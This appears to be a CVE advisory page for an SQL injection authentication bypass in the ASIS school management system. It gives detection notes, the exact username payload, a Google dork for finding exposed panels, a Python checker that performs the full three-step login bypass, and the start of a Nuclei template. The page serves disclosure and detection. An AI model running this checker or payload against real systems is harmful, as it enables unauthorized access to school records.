CVE-2024-45622
Published: 2024-09-02

CVE-2024-45622: ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.

Priority: P275
Severity: critical, CVSS 3.1 base score 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available (Nuclei template indexed below)
EPSS: 36.05% (98.3rd percentile)
Detection & IOCs (extracted from sources)

- Probe for the ASIS login panel by checking for the string 'ASIS | Aplikasi Sistem Sekolah' in the HTTP response body of GET /asispanel/.
- An exploitation attempt is a POST to /asispanel/login/cek with Content-Type application/x-www-form-urlencoded carrying the SQL injection payload in the username field (' or 0=0 ##).
- Use the Google dork "ASIS | Aplikasi Sistem Sekolah" to identify exposed ASIS instances.
- The vulnerability affects ASIS versions 3.0.0 through 3.2.0 only; versions beyond 3.2.0 are not confirmed vulnerable.
- The exploit requires three sequential HTTP requests: first confirming the panel exists (HTTP 200 with the fingerprint string), then sending the SQLi payload (expecting HTTP 303), then verifying access to /asispanel/home (HTTP 200 with 'Logout').
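The three-request sequence above, written out as a staged checker. This is an added example, not code from the page, from the Nuclei template, or from the ASIS project. It uses the fingerprint string, endpoints, status codes and username payload quoted above; the password value, the host name asis.example and the FakeAsis stand-in server are assumptions made so the logic can run offline. Two details the list leaves implicit are handled explicitly: the transport must carry the session cookie set by the 303 into the third request, and it must not follow the redirect, otherwise step 2 never sees the 303 it decides on.

```python
"""Staged check for CVE-2024-45622 (ASIS SQL injection authentication bypass).

Steps: fingerprint /asispanel/, POST the injected username to
/asispanel/login/cek, then confirm the session reaches /asispanel/home.
The HTTP transport is a plain callable, so the same logic runs offline
against the constructed FakeAsis below and, via urllib_transport(), for real.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urljoin
import http.cookiejar
import urllib.error
import urllib.request

FINGERPRINT = "ASIS | Aplikasi Sistem Sekolah"  # panel title string from the page
PANEL_PATH = "asispanel/"
LOGIN_PATH = "asispanel/login/cek"
HOME_PATH = "asispanel/home"
INJECTED_USERNAME = "' or 0=0 ##"               # username payload quoted on the page
DUMMY_PASSWORD = "x"                            # assumption: the page gives no password value


@dataclass
class Response:
    status: int
    body: str


# send(method, url, body, headers) -> Response. A transport must keep cookies
# between calls (the 303 sets the session) and must not follow redirects.
Transport = Callable[[str, str, Optional[bytes], Dict[str, str]], Response]


def check_asis(base_url: str, send: Transport) -> Tuple[bool, List[str]]:
    """Run the three steps in order; stop at the first one that fails."""
    base = base_url.rstrip("/") + "/"
    log: List[str] = []

    r = send("GET", urljoin(base, PANEL_PATH), None, {})
    if r.status != 200 or FINGERPRINT not in r.body:
        log.append(f"step1: no ASIS panel at {base} (HTTP {r.status})")
        return False, log
    log.append("step1: ASIS panel fingerprint matched")

    form = urlencode({"username": INJECTED_USERNAME, "password": DUMMY_PASSWORD}).encode()
    r = send("POST", urljoin(base, LOGIN_PATH), form,
             {"Content-Type": "application/x-www-form-urlencoded"})
    if r.status != 303:
        log.append(f"step2: injected login not redirected (HTTP {r.status}); not vulnerable")
        return False, log
    log.append("step2: injected login answered 303")

    r = send("GET", urljoin(base, HOME_PATH), None, {})
    if r.status == 200 and "Logout" in r.body:
        log.append("step3: authenticated home page reached: VULNERABLE")
        return True, log
    log.append(f"step3: home page not reachable (HTTP {r.status})")
    return False, log


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # urllib then raises HTTPError for the 3xx instead of following it


def urllib_transport(timeout: float = 10.0) -> Transport:
    """Real transport: one cookie jar per scan, redirects surfaced as status codes."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()), _NoRedirect())

    def send(method: str, url: str, body: Optional[bytes], headers: Dict[str, str]) -> Response:
        req = urllib.request.Request(url, data=body, headers=headers, method=method)
        try:
            with opener.open(req, timeout=timeout) as resp:
                return Response(resp.status, resp.read().decode("utf-8", "replace"))
        except urllib.error.HTTPError as err:
            return Response(err.code, err.read().decode("utf-8", "replace"))

    return send


class FakeAsis:
    """Constructed stand-in for an ASIS panel (not a real server).
    patched=True answers the injected login with a normal error page."""

    def __init__(self, patched: bool = False):
        self.patched = patched
        self.session = False  # stands in for the session cookie a real transport carries

    def __call__(self, method: str, url: str, body: Optional[bytes], headers: Dict[str, str]) -> Response:
        if method == "GET" and url.endswith("/" + PANEL_PATH):
            return Response(200, f"<title>{FINGERPRINT}</title>")
        if method == "POST" and url.endswith("/" + LOGIN_PATH):
            username = parse_qs(body.decode())["username"][0]
            if "' or 0=0" in username and not self.patched:
                self.session = True
                return Response(303, "")
            return Response(200, "login failed")
        if method == "GET" and url.endswith("/" + HOME_PATH):
            return Response(200, "<a href='/asispanel/logout'>Logout</a>") if self.session else Response(303, "")
        return Response(404, "")


if __name__ == "__main__":
    for label, server in (("vulnerable", FakeAsis()), ("patched", FakeAsis(patched=True))):
        vulnerable, log = check_asis("http://asis.example", server)
        print(f"{label}: vulnerable={vulnerable}", *log, sep="\n  ")
```

Against a real host, pass `urllib_transport()` as the second argument; the first request is a harmless GET, but the second is a live login attempt with the injection payload, so run it only against systems you are authorized to test. A host that answers step 2 with anything other than 303 is reported as not vulnerable, which matches the page's note that only 3.0.0 through 3.2.0 are confirmed affected.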
No detection rules found.
Nuclei template: ASIS - SQL Injection Authentication Bypass (CVE-2024-45622, severity critical, CVSS 9.8)

Template:

id: CVE-2024-45622

info:
  name: ASIS - SQL Injection Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
  impact: |
    Unauthenticated attackers can bypass authentication via SQL injection to gain unauthorized access to the ASIS system.
  remediation: |
    Update ASIS to a version later than 3.2.0 that patches the SQL injection vulnerability.
  reference:
    - https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgni
No writeups or analysis indexed.